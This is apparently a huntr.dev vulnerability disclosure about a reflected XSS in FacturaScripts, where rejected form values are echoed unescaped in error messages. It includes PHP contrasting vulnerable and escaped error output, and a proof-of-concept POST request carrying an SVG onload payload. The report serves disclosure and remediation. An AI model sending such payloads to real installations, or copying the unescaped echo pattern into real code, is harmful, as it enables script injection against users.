Cross-site scripting - Reflected XSS caused by error logs in neorazorx/facturascripts

huntr ID: 5FA17E9B-C767-46B4-AF64-AAFB8C2AA521
Reported by: iohehe
Date: 2022-06-04 13:03:56
Source: www.huntr.dev

EPSS: 0.001 (Low), percentile 21.6%

Description

Two fields allow an XSS payload to be injected through the error log:

  1. http://127.0.0.1/facturascripts/EditBalance, the codbalance field
  2. http://127.0.0.1/facturascripts/EditSettings, the tipoidfiscal field in Fiscal Id

Both fields accept only 1 to 25 letters or digits (no spaces, accents or any other character), so the payload cannot be stored. The rejected value is echoed back in the validation error, however, which yields a reflected XSS via the error log.
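The defect described above is the combination of a validator that correctly rejects the input and an error message that echoes the rejected input back into HTML unescaped. The following PHP is an added example, not FacturaScripts code: the function names, the alert markup and the exact message wording are assumptions, but the 1-25 alphanumeric rule and the payload come from the report. It contrasts the vulnerable message builder with two hardened variants.

```php
<?php
// Added example (not FacturaScripts code). Models a validator for a 1-25
// character alphanumeric code such as "codbalance" or "tipoidfiscal" and
// three ways of reporting a rejected value. All names are assumptions.

declare(strict_types=1);

/** True when $value is 1-25 ASCII letters or digits, as the forms require. */
function isValidCode(string $value): bool
{
    return preg_match('/^[A-Za-z0-9]{1,25}$/', $value) === 1;
}

/** Vulnerable pattern: the rejected input is concatenated into HTML as-is. */
function errorHtmlUnsafe(string $field, string $value): string
{
    return '<div class="alert alert-danger">Invalid value for ' . $field
        . ': ' . $value . '</div>';
}

/** Hardened pattern: escape for an HTML text context before output. */
function errorHtmlSafe(string $field, string $value): string
{
    $esc = fn(string $s): string => htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<div class="alert alert-danger">Invalid value for ' . $esc($field)
        . ': ' . $esc($value) . '</div>';
}

/** Alternative hardening: keep the raw value in the server log only and
 *  tell the user the rule that was violated instead of echoing the input. */
function errorHtmlNoEcho(string $field, string $value): string
{
    error_log(sprintf('rejected %s value (len=%d)', $field, strlen($value)));
    return '<div class="alert alert-danger">Invalid value for '
        . htmlspecialchars($field, ENT_QUOTES | ENT_HTML5, 'UTF-8')
        . ': only 1 to 25 letters or digits are allowed</div>';
}

// Demonstration with the payload from the report. Validation rejects it, so
// nothing is stored; what matters is how the rejection is rendered.
$payload = "CI<svg/onload='alert(/xss/);'>";
var_dump(isValidCode('CI'));
var_dump(isValidCode($payload));

if (!isValidCode($payload)) {
    // The unsafe builder returns markup containing a live <svg> element.
    echo errorHtmlUnsafe('tipoidfiscal', $payload), PHP_EOL;
    // The safe builders return markup in which the payload is inert text.
    echo errorHtmlSafe('tipoidfiscal', $payload), PHP_EOL;
    echo errorHtmlNoEcho('tipoidfiscal', $payload), PHP_EOL;
}
```

The regex check alone is not the fix: the validator already rejects the payload in the report. The fix is that anything derived from request input, including the text of an error message, is escaped for the context it is written into (or simply not echoed). In a templating layer with autoescaping, the equivalent mistake is marking the message as raw or safe output.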

Proof of Concept

POST /facturascripts/EditSettings HTTP/1.1
Host: 127.0.0.1
...
------WebKitFormBoundaryYIfWjQXpEB2jLexN
Content-Disposition: form-data; name="action"

edit
------WebKitFormBoundaryYIfWjQXpEB2jLexN
Content-Disposition: form-data; name="activetab"

EditIdentificadorFiscal
------WebKitFormBoundaryYIfWjQXpEB2jLexN
Content-Disposition: form-data; name="code"

CI
------WebKitFormBoundaryYIfWjQXpEB2jLexN
Content-Disposition: form-data; name="multireqtoken"

61893af8ff1671201dcbeaff4d052cf544c4de1e|MvOEut
------WebKitFormBoundaryYIfWjQXpEB2jLexN
Content-Disposition: form-data; name="tipoidfiscal"

CI<svg/onload='alert(/xss/);'>
------WebKitFormBoundaryYIfWjQXpEB2jLexN
Content-Disposition: form-data; name="codeid"


------WebKitFormBoundaryYIfWjQXpEB2jLexN--
